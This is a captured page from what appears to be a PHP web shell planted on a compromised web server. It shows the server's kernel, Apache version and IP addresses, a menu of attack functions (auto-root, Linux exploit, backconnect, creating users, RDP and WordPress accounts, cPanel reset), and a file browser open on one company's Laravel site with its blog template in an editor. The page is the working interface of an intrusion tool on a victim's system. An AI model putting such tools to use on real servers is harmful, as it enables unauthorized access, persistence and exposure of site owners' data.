Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.190.110
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
noahresources.com /
source /
resources /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
client_panel
[ DIR ]
drwxr-xr-x
emails
[ DIR ]
drwxr-xr-x
errors
[ DIR ]
drwxr-xr-x
exports
[ DIR ]
drwxr-xr-x
layouts
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
about_us.blade.php
9.98
KB
-rw-r--r--
blogs.blade.php
4.31
KB
-rw-r--r--
contact_us.blade.php
9.56
KB
-rw-r--r--
index.blade.php
31.64
KB
-rw-r--r--
index_old.blade.php
940
B
-rw-r--r--
portfolio.blade.php
14.99
KB
-rw-r--r--
post.blade.php
6.25
KB
-rw-r--r--
practice_area.blade.php
2.1
KB
-rw-r--r--
privacy_security.blade.php
1.62
KB
-rw-r--r--
projects.blade.php
1.68
KB
-rw-r--r--
review.blade.php
9.18
KB
-rw-r--r--
search.blade.php
13.68
KB
-rw-r--r--
service_detail.blade.php
7.23
KB
-rw-r--r--
services.blade.php
2.09
KB
-rw-r--r--
sitemap.blade.php
4.12
KB
-rw-r--r--
sitemapxml.blade.php
2.34
KB
-rw-r--r--
templates.blade.php
42.18
KB
-rw-r--r--
terms.blade.php
2.6
KB
-rw-r--r--
thank_you.blade.php
1.07
KB
-rw-r--r--
welcome.blade.php
72.5
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : blogs.blade.php
@extends('layouts.app') @section('contents') <style> .top_mar{ margin-top: 32px; } .owl-carousel .owl-item img { height: auto !important; } </style> <?php if(isset($_GET['gclid'])){ $gclid=$_GET['gclid']; }else{ $gclid=''; } ?> <?php if(isset($_GET['MSCLKID'])){ $MSCLKID=$_GET['MSCLKID']; }else{ $MSCLKID=''; } ?> <!-- Page Title --> <section class="page-title centred" style="background-image: url({{'assets/images/background/page-title.jpg'}});"> <div class="auto-container"> <div class="content-box"> <div class="title"> <h1>Blog Post</h1> </div> </div> </div> </section> <!-- End Page Title --> <!-- blog-grid --> <section class="blog-grid"> <div class="auto-container"> <div class="row clearfix"> @foreach($blogs as $blog) <div class="col-lg-4 col-md-6 col-sm-12 news-block"> <div class="news-block-one wow fadeInUp animated animated" data-wow-delay="00ms" data-wow-duration="1500ms"> <div class="inner-box"> <figure class="image-box"> <a href="{{url('blog/'.$blog->slug)}}"><img src="{{'assets/blog-posts/'.$blog->featured_image}}" alt="{{$blog->featured_alt}}" style="height: 230px"></a> <div class="post-date"> @php $created_at = \Carbon\Carbon::parse($blog->created_at); $date = $created_at->format('d'); $month = $created_at->format('M'); @endphp <h4>{{$date}}</h4> <p>{{$month}}</p> </div> </figure> <div class="lower-content"> <ul class="post-info clearfix"> <li><i class="far fa-folder-open"></i>Human Resource</li> <li><i class="far fa-comments"></i><a href="">02 Comments</a></li> </ul> <h3><a href="{{url('blog/'.$blog->slug)}}">{{$blog->post_title}}</a></h3> <div class="admin"> <figure class="admin-thumb"><img src="assets/images/news/admin-1.png" alt=""></figure> <p>by Christine Eve</p> </div> </div> </div> </div> </div> @endforeach </div> <div class="pagination-wrapper centred"> <ul class="pagination clearfix"> @if ($blogs->onFirstPage()) <li class="disabled"><a href=""><i class="flaticon-left-arrow"></i></a></li> @else <li><a href="{{ $blogs->previousPageUrl() }}"><i class="flaticon-left-arrow"></i></a></li> @endif @php $start = max($blogs->currentPage() - 2, 1); $end = min($start + 4, $blogs->lastPage()); @endphp @for ($page = $start; $page <= $end; $page++) @if ($page == $blogs->currentPage()) <li><a href="" class="current">{{ $page }}</a></li> @else <li><a href="{{ $blogs->url($page) }}">{{ $page }}</a></li> @endif @endfor @if ($blogs->hasMorePages()) <li><a href="{{ $blogs->nextPageUrl() }}"><i class="flaticon-right-arrow"></i></a></li> @else <li class="disabled"><a href=""><i class="flaticon-right-arrow"></i></a></li> @endif </ul> </div> </div> </section> <!-- blog-grid end --> @endsection
Close